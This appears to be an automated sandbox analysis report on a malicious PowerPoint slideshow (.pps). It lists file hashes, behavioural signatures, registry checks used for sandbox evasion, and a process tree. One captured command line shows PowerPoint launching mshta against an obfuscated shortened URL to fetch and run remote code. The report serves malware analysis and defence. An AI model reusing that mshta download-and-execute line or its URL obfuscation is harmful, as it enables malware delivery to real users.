Analysis
- max time kernel: 146s
- max time network: 145s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 05-03-2021 05:43
Static task: static1
Behavioral task: behavioral1
- Sample: a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
- Resource: win10v20201028
General
- Target: a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps
- Size: 141KB
- MD5: 53f09cdb89620ee0d02c006d5bdf758f
- SHA1: caf1ff6f5563d23eac7c547f2309c0608ae3029f
- SHA256: a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca
- SHA512: 60374ee268f24ce193c860caf5ccf779a94388f44923bf2ecd5ba3273dfe937c4d8f960cdd906f56eccd39a81623636a2b07c22f116de8f1ee48cbe5f89b8a94
Malware Config
Signatures

Process spawned unexpected child process (2 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes (description | pid | pid_target | process | target process):
- Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 1244 | 984 | mSHtA.exe | POWERPNT.EXE
- Parent C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE is not expected to spawn this process | 2056 | 984 | ping.exe | POWERPNT.EXE

Blocklisted process makes network request (10 IoCs)
Processes (flow | pid | process):
- 34 | 1244 | mSHtA.exe
- 36 | 1244 | mSHtA.exe
- 38 | 1244 | mSHtA.exe
- 41 | 1244 | mSHtA.exe
- 42 | 1244 | mSHtA.exe
- 45 | 1244 | mSHtA.exe
- 46 | 1244 | mSHtA.exe
- 47 | 1244 | mSHtA.exe
- 48 | 1244 | mSHtA.exe
- 50 | 1244 | mSHtA.exe

Program crash (1 IoC)
Processes (pid | pid_target | process | target process):
- 2712 | 1244 | WerFault.exe | mSHtA.exe

Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes (description | ioc | process):
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mSHtA.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mSHtA.exe
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | POWERPNT.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | POWERPNT.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | POWERPNT.EXE
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | winword.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | winword.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | winword.exe

Enumerates system info in registry (2 TTPs, 6 IoCs)
Processes (description | ioc | process):
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | POWERPNT.EXE
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | winword.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | winword.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | winword.exe
- Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | POWERPNT.EXE
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | POWERPNT.EXE

Runs ping.exe (1 TTP, 1 IoC)

Suspicious behavior: AddClipboardFormatListener (3 IoCs)
Processes (pid | process):
- 984 | POWERPNT.EXE
- 1492 | winword.exe
- 1492 | winword.exe

Suspicious behavior: EnumeratesProcesses (15 IoCs)
Processes (pid | process):
- 2712 | WerFault.exe (15 identical entries)

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes (description | pid | process):
- Token: SeDebugPrivilege | 2712 | WerFault.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
Processes (pid | process):
- 984 | POWERPNT.EXE
- 1492 | winword.exe
- 1492 | winword.exe
- 1492 | winword.exe
- 1244 | mSHtA.exe
- 984 | POWERPNT.EXE

Suspicious use of WriteProcessMemory (6 IoCs)
Processes (description | pid | process | target process):
- PID 984 wrote to memory of 1244 | 984 | POWERPNT.EXE | mSHtA.exe
- PID 984 wrote to memory of 1244 | 984 | POWERPNT.EXE | mSHtA.exe
- PID 984 wrote to memory of 2056 | 984 | POWERPNT.EXE | ping.exe
- PID 984 wrote to memory of 2056 | 984 | POWERPNT.EXE | ping.exe
- PID 984 wrote to memory of 1492 | 984 | POWERPNT.EXE | winword.exe
- PID 984 wrote to memory of 1492 | 984 | POWERPNT.EXE | winword.exe
Processes (process tree; depth shown by indentation, PIDs taken from the signature tables above)

C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE (PID 984)
Command line: "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a9194b2dc593c73598cc95b3b1aad400910f48225e527dc61159300be44651ca.pps" /ou ""
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

    C:\Windows\SYSTEM32\mSHtA.exe (PID 1244)
    Command line: mSHtA http://12384928198391823%12384928198391823@j.mp/akawdowdkwoapdlwnduhand
    - Process spawned unexpected child process
    - Blocklisted process makes network request
    - Checks processor information in registry
    - Suspicious use of SetWindowsHookEx

        C:\Windows\system32\WerFault.exe (PID 2712)
        Command line: C:\Windows\system32\WerFault.exe -u -p 1244 -s 2588
        - Program crash
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken

    C:\Windows\SYSTEM32\ping.exe (PID 2056)
    Command line: ping
    - Process spawned unexpected child process
    - Runs ping.exe

    C:\Program Files\Microsoft Office\Root\Office16\winword.exe (PID 1492)
    Command line: winword
    - Checks processor information in registry
    - Enumerates system info in registry
    - Suspicious behavior: AddClipboardFormatListener
    - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5: 50308e654d10f196ff97f70c8ae32be8
  SHA1: 44af0ff1918b729945b6b7052250f13cfe2e154a
  SHA256: bb4aa4afd64c31f895454eb788ddab2d6da854e80b59d55822cd7beb6b3d0ccb
  SHA512: ba8f253774cb7438361a48f4e671a0417ae450095f062761e6a4bd5f9a422f4276af28ec3ab7135db24843600276fb7fa41284753bc6feda6aeb22ac45ad32a4
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_C5130A0BDC8C859A2757D77746C10868
  MD5: 37f36f73f12f6bc33e6626852def24a2
  SHA1: db33554321fcc997d79622d0885db84ec73893cb
  SHA256: b0189497d991bfd745a8cad8536f3b2c7307c324beacaba3fd3cf0cdc3133c58
  SHA512: 72264ae3e28d3eff0c3569fb26a2aa5baf68675f28384f81face16a0d9fbab52fe49771ea575a448154d02c357a08f5f9d2281913ef0b79ae2bdf307a5f75712
Memory dumps (file | filesize):
- memory/984-18-0x00007FF90A2A0000-0x00007FF90BE7D000-memory.dmp | 27.9MB
- memory/984-21-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-6-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-5-0x00007FF909C60000-0x00007FF90A297000-memory.dmp | 6.2MB
- memory/984-22-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-4-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-3-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-2-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-19-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/984-20-0x00007FF8E7720000-0x00007FF8E7730000-memory.dmp | 64KB
- memory/1244-7-0x0000000000000000-mapping.dmp
- memory/1492-9-0x0000000000000000-mapping.dmp
- memory/1492-13-0x00007FF909C60000-0x00007FF90A297000-memory.dmp | 6.2MB
- memory/2056-8-0x0000000000000000-mapping.dmp
- memory/2712-15-0x0000020C132B0000-0x0000020C132B1000-memory.dmp | 4KB